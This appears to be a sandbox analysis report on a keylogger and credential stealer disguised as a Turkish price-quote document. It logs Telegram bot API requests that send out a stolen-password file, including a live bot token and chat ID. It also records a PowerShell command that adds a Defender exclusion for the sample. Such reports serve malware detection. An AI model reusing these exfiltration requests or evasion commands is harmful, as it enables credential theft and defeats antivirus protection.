                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1610&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1802469&cwnd=221&unsent_bytes=0&cid=25cc97dcf0c45650&ts=137&x=0"
                                                                                      2025-01-09 18:01:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.749717104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:16 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2025-01-09 18:01:16 UTC851INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:16 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760465
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YZ7BSAql3SVsmk6jUKolsaLbSjLkUT9QCgM1sre7IJZC0aixjqmvIK6G1Ho91eysbTqCI5%2B7WRCMixkTF5vRlJPzywqKXap7Ar4gUvrw7apSpfNSy2udHkkIWLUWqqYY7GBWgnDQ"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654e43a65727b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1966&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1474003&cwnd=234&unsent_bytes=0&cid=889e17ef428c6658&ts=162&x=0"
                                                                                      2025-01-09 18:01:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.749720104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:17 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:17 UTC856INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:17 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760466
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyB9w0O41UbFV4RJkNELbdDAABQ6bzitOZhE11KNpMAPw2gS5BknQre0XqmSs5j%2FkW1SvtVjoAdBnQiTlLxmJd51GUQHBn8%2FqJ2asbBVN5wrrZexCy%2FG8hmS8qM1NaMQmoFaeSRj"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654edb94b424b-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=7146&min_rtt=1630&rtt_var=4040&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1791411&cwnd=248&unsent_bytes=0&cid=e31557b3cdc6d20c&ts=144&x=0"
                                                                                      2025-01-09 18:01:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.749732104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:19 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2025-01-09 18:01:19 UTC859INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:19 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760468
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4JHTAZlqJVRmWx6%2BQ5SafnIw0RCX7HUS%2FsW8RoD3HbDCkyaYGWP393j9RK6SsKkxBT%2Fe6IuQhSz09NORdPTiGXVnskTgdMt7%2F89ksJRSImdTEvh4y6R0G1u0Dmo%2BNja28ViYYgH"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654f6cc75729f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1930&rtt_var=723&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1512953&cwnd=169&unsent_bytes=0&cid=b6500337e642a187&ts=162&x=0"
                                                                                      2025-01-09 18:01:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.749739104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:20 UTC869INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:20 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760469
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5V4lcKl0mra7B%2BbAq7ZkZmLA%2BzIlg5%2BDydZIRXGUqOje2HT%2FLEqxlmI9LwdZjd%2B%2BPNFPK%2B7Re%2B3ME8a9uTNES9ASnsvckE%2BnlOWRi2vTHtBWekHtZxGVwvdS4YlykH8e0kWRVvH"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff654ffd93b43b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=10287&min_rtt=1591&rtt_var=5895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1835323&cwnd=203&unsent_bytes=0&cid=adec35c87dd7acfe&ts=169&x=0"
                                                                                      2025-01-09 18:01:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.749751104.21.112.14436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:22 UTC861INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 18:01:22 GMT
                                                                                      Content-Type: text/xml
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Age: 1760471
                                                                                      Cache-Control: max-age=31536000
                                                                                      cf-cache-status: HIT
                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FV9sxWiOK4xwMQrsETZzU2zmD6%2BDnx5LbjR%2B1CE6n891pJpC%2FYAKU12jIU2rb0DS8O0ya5%2FQnAIZiaImDgsMfZr4CY3SJlJHnZByqsfBYKMvChdx%2BJZF8Rbgw5DlJUcW1%2BOXU8GG"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff6550a2ea343b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1587&rtt_var=793&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=32736&cwnd=203&unsent_bytes=0&cid=02654d513fd3a24a&ts=351&x=0"
                                                                                      2025-01-09 18:01:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.749757149.154.167.2204436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:23 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2010/01/2025%20/%2004:43:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-09 18:01:23 UTC344INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Thu, 09 Jan 2025 18:01:23 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 55
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2025-01-09 18:01:23 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.749804149.154.167.2204436368C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 18:01:30 UTC353OUTPOST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd31a0fcea8a14
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 585
                                                                                      2025-01-09 18:01:30 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 61 30 66 63 65 61 38 61 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 39 2f 30 31 2f 32 30 32 35 20 2f 20 31 33 3a 30 31
                                                                                      Data Ascii: --------------------------8dd31a0fcea8a14Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:585948Date and Time: 09/01/2025 / 13:01
                                                                                      2025-01-09 18:01:30 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Thu, 09 Jan 2025 18:01:30 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 540
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2025-01-09 18:01:30 UTC540INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 31 31 32 37 33 37 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 65 6c 47 72 6f 75 70 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 65 6c 31 30 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 33 32 36 38 32 30 34 31 2c 22 74 69 74 6c 65 22 3a 22 44 65 6c 65 74 65 64 20 47 72 6f 75 70 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 35 36 39 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":13749,"from":{"id":7611127374,"is_bot":true,"first_name":"DelGroup","username":"Del101bot"},"chat":{"id":-4732682041,"title":"Deleted Group","type":"group","all_members_are_administrators":true},"date":1736445690,"documen


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:13:01:04
                                                                                      Start date:09/01/2025
                                                                                      Path:C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                      Imagebase:0x180000
                                                                                      File size:754'688 bytes
                                                                                      MD5 hash:1579F7D1A5AF2D811A9ADE177CA3ED73
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1519490045.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:13:01:05
                                                                                      Start date:09/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                      Imagebase:0xa50000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:13:01:05
                                                                                      Start date:09/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff75da10000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:13:01:05
                                                                                      Start date:09/01/2025
                                                                                      Path:C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                                                                                      Imagebase:0xa00000
                                                                                      File size:754'688 bytes
                                                                                      MD5 hash:1579F7D1A5AF2D811A9ADE177CA3ED73
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3708001615.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3710704930.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3710704930.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:13:01:06
                                                                                      Start date:09/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 1832
